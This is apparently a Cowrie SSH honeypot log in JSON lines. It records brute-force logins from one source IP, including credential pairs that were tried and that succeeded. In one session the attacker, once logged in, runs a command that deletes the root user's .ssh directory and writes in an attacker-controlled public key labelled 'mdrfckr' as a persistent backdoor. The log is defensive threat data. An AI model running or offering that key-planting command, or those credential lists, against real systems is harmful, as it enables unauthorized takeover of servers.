{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T23:01:43.689416Z","src_ip":"212.227.235.229","session":"0028ebbaa1c3"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-09-08T23:01:43.777038Z","src_ip":"212.227.235.229","session":"0028ebbaa1c3"}
{"eventid":"cowrie.client.fingerprint","username":"admin","fingerprint":"f5:46:60:4e:82:6f:09:3f:34:9b:67:94:d3:c1:70:ce","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCkvKuOfk2vdyDIVynV5MTNaWDQkJWJNP5PjSli2p/SuM8i+JDsLlVq1VJffTS5JFHoPfXRQ7Qum/Nn9vH8JFYXCP1x4CjCYQu1kXHoUX2yx6OWfz1UJsks9DjnrPO7GavqoKGkuCbhO75A2WMVyRYDqixWg7EwpA7JcoYJ2ncgiT4ulZWtTL9Wevpkihsw/x3Nslj74Q9nG4nvN0N5QiX5T6pABJuVqUCOqX4PuLNiA/IFORYyf8rj8CFz9ZW3qRX2iygAWCioAcAEv64i8BZpKekdmaX+9YgEH0lx3KRHD+1cPda2WbDtQQwL72mQhMi3+G+UpKNUuyM6Fm7cDHhqP2N14afCyeOvB6yWNAMklEdkyzMmZgD/qyNzPJk2pUN4CxkwP8o7mGyfcYhqN8q0X4GY/BgfhH1Q62fm2MME+a9cXgM9F0mdUolr6D+f8gMhVdQxqnAo6guxQXK9llffQurCl1nDNtV8LXY828juOfDXOIpK5w53Q0wF8VBp23kTyA/vVar/e7g1MYmkmmI6hyIAZAl8PU5kfz08dyQ8IW2HFM7pHYDTaT8CbJwTQ3M6fSafYU0jmJiFZtJnpJ1A+T2bujiRDWtC3TtrwQXEVNrrKVpoRMJtAy5SCCtugG46DZA0brChC+DPbQxxo8BhwDQQHAeZsnrSXEYHpmD0CQ==","type":"ssh-rsa","message":"public key attempt for user admin of type ssh-rsa with fingerprint f5:46:60:4e:82:6f:09:3f:34:9b:67:94:d3:c1:70:ce","sensor":"my-vps","timestamp":"2025-09-08T23:01:44.043040Z","src_ip":"212.227.235.229","session":"0028ebbaa1c3"}
{"eventid":"cowrie.login.failed","username":"admin","fingerprint":"f5:46:60:4e:82:6f:09:3f:34:9b:67:94:d3:c1:70:ce","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCkvKuOfk2vdyDIVynV5MTNaWDQkJWJNP5PjSli2p/SuM8i+JDsLlVq1VJffTS5JFHoPfXRQ7Qum/Nn9vH8JFYXCP1x4CjCYQu1kXHoUX2yx6OWfz1UJsks9DjnrPO7GavqoKGkuCbhO75A2WMVyRYDqixWg7EwpA7JcoYJ2ncgiT4ulZWtTL9Wevpkihsw/x3Nslj74Q9nG4nvN0N5QiX5T6pABJuVqUCOqX4PuLNiA/IFORYyf8rj8CFz9ZW3qRX2iygAWCioAcAEv64i8BZpKekdmaX+9YgEH0lx3KRHD+1cPda2WbDtQQwL72mQhMi3+G+UpKNUuyM6Fm7cDHhqP2N14afCyeOvB6yWNAMklEdkyzMmZgD/qyNzPJk2pUN4CxkwP8o7mGyfcYhqN8q0X4GY/BgfhH1Q62fm2MME+a9cXgM9F0mdUolr6D+f8gMhVdQxqnAo6guxQXK9llffQurCl1nDNtV8LXY828juOfDXOIpK5w53Q0wF8VBp23kTyA/vVar/e7g1MYmkmmI6hyIAZAl8PU5kfz08dyQ8IW2HFM7pHYDTaT8CbJwTQ3M6fSafYU0jmJiFZtJnpJ1A+T2bujiRDWtC3TtrwQXEVNrrKVpoRMJtAy5SCCtugG46DZA0brChC+DPbQxxo8BhwDQQHAeZsnrSXEYHpmD0CQ==","type":"ssh-rsa","message":"public key login attempt for [admin] failed","sensor":"my-vps","timestamp":"2025-09-08T23:01:44.043747Z","src_ip":"212.227.235.229","session":"0028ebbaa1c3"}
{"eventid":"cowrie.client.fingerprint","username":"admin","fingerprint":"f5:46:60:4e:82:6f:09:3f:34:9b:67:94:d3:c1:70:ce","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCkvKuOfk2vdyDIVynV5MTNaWDQkJWJNP5PjSli2p/SuM8i+JDsLlVq1VJffTS5JFHoPfXRQ7Qum/Nn9vH8JFYXCP1x4CjCYQu1kXHoUX2yx6OWfz1UJsks9DjnrPO7GavqoKGkuCbhO75A2WMVyRYDqixWg7EwpA7JcoYJ2ncgiT4ulZWtTL9Wevpkihsw/x3Nslj74Q9nG4nvN0N5QiX5T6pABJuVqUCOqX4PuLNiA/IFORYyf8rj8CFz9ZW3qRX2iygAWCioAcAEv64i8BZpKekdmaX+9YgEH0lx3KRHD+1cPda2WbDtQQwL72mQhMi3+G+UpKNUuyM6Fm7cDHhqP2N14afCyeOvB6yWNAMklEdkyzMmZgD/qyNzPJk2pUN4CxkwP8o7mGyfcYhqN8q0X4GY/BgfhH1Q62fm2MME+a9cXgM9F0mdUolr6D+f8gMhVdQxqnAo6guxQXK9llffQurCl1nDNtV8LXY828juOfDXOIpK5w53Q0wF8VBp23kTyA/vVar/e7g1MYmkmmI6hyIAZAl8PU5kfz08dyQ8IW2HFM7pHYDTaT8CbJwTQ3M6fSafYU0jmJiFZtJnpJ1A+T2bujiRDWtC3TtrwQXEVNrrKVpoRMJtAy5SCCtugG46DZA0brChC+DPbQxxo8BhwDQQHAeZsnrSXEYHpmD0CQ==","type":"ssh-rsa","message":"public key attempt for user admin of type ssh-rsa with fingerprint f5:46:60:4e:82:6f:09:3f:34:9b:67:94:d3:c1:70:ce","sensor":"my-vps","timestamp":"2025-09-08T23:01:44.133979Z","src_ip":"212.227.235.229","session":"0028ebbaa1c3"}
{"eventid":"cowrie.login.failed","username":"admin","fingerprint":"f5:46:60:4e:82:6f:09:3f:34:9b:67:94:d3:c1:70:ce","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCkvKuOfk2vdyDIVynV5MTNaWDQkJWJNP5PjSli2p/SuM8i+JDsLlVq1VJffTS5JFHoPfXRQ7Qum/Nn9vH8JFYXCP1x4CjCYQu1kXHoUX2yx6OWfz1UJsks9DjnrPO7GavqoKGkuCbhO75A2WMVyRYDqixWg7EwpA7JcoYJ2ncgiT4ulZWtTL9Wevpkihsw/x3Nslj74Q9nG4nvN0N5QiX5T6pABJuVqUCOqX4PuLNiA/IFORYyf8rj8CFz9ZW3qRX2iygAWCioAcAEv64i8BZpKekdmaX+9YgEH0lx3KRHD+1cPda2WbDtQQwL72mQhMi3+G+UpKNUuyM6Fm7cDHhqP2N14afCyeOvB6yWNAMklEdkyzMmZgD/qyNzPJk2pUN4CxkwP8o7mGyfcYhqN8q0X4GY/BgfhH1Q62fm2MME+a9cXgM9F0mdUolr6D+f8gMhVdQxqnAo6guxQXK9llffQurCl1nDNtV8LXY828juOfDXOIpK5w53Q0wF8VBp23kTyA/vVar/e7g1MYmkmmI6hyIAZAl8PU5kfz08dyQ8IW2HFM7pHYDTaT8CbJwTQ3M6fSafYU0jmJiFZtJnpJ1A+T2bujiRDWtC3TtrwQXEVNrrKVpoRMJtAy5SCCtugG46DZA0brChC+DPbQxxo8BhwDQQHAeZsnrSXEYHpmD0CQ==","type":"ssh-rsa","message":"public key login attempt for [admin] failed","sensor":"my-vps","timestamp":"2025-09-08T23:01:44.134615Z","src_ip":"212.227.235.229","session":"0028ebbaa1c3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45210,"dst_ip":"1.2.3.4","dst_port":22,"session":"26d5db0af289","protocol":"ssh","message":"New connection: 212.227.235.229:45210 (1.2.3.4:22) [session: 26d5db0af289]","sensor":"my-vps","timestamp":"2025-09-08T23:01:44.762427Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:01:44.763408Z","src_ip":"212.227.235.229","session":"26d5db0af289"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:01:44.900656Z","src_ip":"212.227.235.229","session":"26d5db0af289"}
{"eventid":"cowrie.login.failed","username":"public","password":"pass","message":"login attempt [public/pass] failed","sensor":"my-vps","timestamp":"2025-09-08T23:01:45.484562Z","src_ip":"212.227.235.229","session":"26d5db0af289"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:01:46.624083Z","src_ip":"212.227.235.229","session":"26d5db0af289"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:01:53.688259Z","src_ip":"212.227.235.229","session":"0028ebbaa1c3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43602,"dst_ip":"1.2.3.4","dst_port":22,"session":"2b3ff85c85ed","protocol":"ssh","message":"New connection: 212.227.235.229:43602 (1.2.3.4:22) [session: 2b3ff85c85ed]","sensor":"my-vps","timestamp":"2025-09-08T23:01:56.037425Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:01:56.038167Z","src_ip":"212.227.235.229","session":"2b3ff85c85ed"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:01:56.272381Z","src_ip":"212.227.235.229","session":"2b3ff85c85ed"}
{"eventid":"cowrie.login.success","username":"root","password":"QWEqwe123","message":"login attempt [root/QWEqwe123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:01:57.211250Z","src_ip":"212.227.235.229","session":"2b3ff85c85ed"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:01:57.698347Z","src_ip":"212.227.235.229","session":"2b3ff85c85ed"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:01:57.699050Z","src_ip":"212.227.235.229","session":"2b3ff85c85ed"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:01:57.700098Z","src_ip":"212.227.235.229","session":"2b3ff85c85ed"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:01:57.936136Z","src_ip":"212.227.235.229","session":"2b3ff85c85ed"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:01:58.507406Z","src_ip":"212.227.235.229","session":"2b3ff85c85ed"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:01:58.508099Z","src_ip":"212.227.235.229","session":"2b3ff85c85ed"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:01:58.744964Z","src_ip":"212.227.235.229","session":"2b3ff85c85ed"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:01:58.745972Z","src_ip":"212.227.235.229","session":"2b3ff85c85ed"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34594,"dst_ip":"1.2.3.4","dst_port":22,"session":"f08b9ca7725f","protocol":"ssh","message":"New connection: 212.227.235.229:34594 (1.2.3.4:22) [session: f08b9ca7725f]","sensor":"my-vps","timestamp":"2025-09-08T23:01:58.971841Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:01:58.972857Z","src_ip":"212.227.235.229","session":"f08b9ca7725f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:01:59.203763Z","src_ip":"212.227.235.229","session":"f08b9ca7725f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:02:00.170265Z","src_ip":"212.227.235.229","session":"f08b9ca7725f"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:02:01.404649Z","src_ip":"212.227.235.229","session":"f08b9ca7725f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34608,"dst_ip":"1.2.3.4","dst_port":22,"session":"b1cca0603350","protocol":"ssh","message":"New connection: 212.227.235.229:34608 (1.2.3.4:22) [session: b1cca0603350]","sensor":"my-vps","timestamp":"2025-09-08T23:02:01.643053Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:02:01.644130Z","src_ip":"212.227.235.229","session":"b1cca0603350"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:02:01.882843Z","src_ip":"212.227.235.229","session":"b1cca0603350"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:02:02.881017Z","src_ip":"212.227.235.229","session":"b1cca0603350"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:02:03.121517Z","src_ip":"212.227.235.229","session":"b1cca0603350"}
{"eventid":"cowrie.session.closed","duration":"7.1","message":"Connection lost after 7.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:02:03.123959Z","src_ip":"212.227.235.229","session":"2b3ff85c85ed"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41354,"dst_ip":"1.2.3.4","dst_port":22,"session":"aee21ace93d0","protocol":"ssh","message":"New connection: 212.227.235.229:41354 (1.2.3.4:22) [session: aee21ace93d0]","sensor":"my-vps","timestamp":"2025-09-08T23:02:15.888251Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:02:15.889336Z","src_ip":"212.227.235.229","session":"aee21ace93d0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:02:15.989395Z","src_ip":"212.227.235.229","session":"aee21ace93d0"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"changeme","message":"login attempt [hadoop/changeme] failed","sensor":"my-vps","timestamp":"2025-09-08T23:02:16.431352Z","src_ip":"212.227.235.229","session":"aee21ace93d0"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:02:17.534391Z","src_ip":"212.227.235.229","session":"aee21ace93d0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35028,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ea55a997c64","protocol":"ssh","message":"New connection: 212.227.235.229:35028 (1.2.3.4:22) [session: 2ea55a997c64]","sensor":"my-vps","timestamp":"2025-09-08T23:02:23.596668Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:02:23.597608Z","src_ip":"212.227.235.229","session":"2ea55a997c64"}
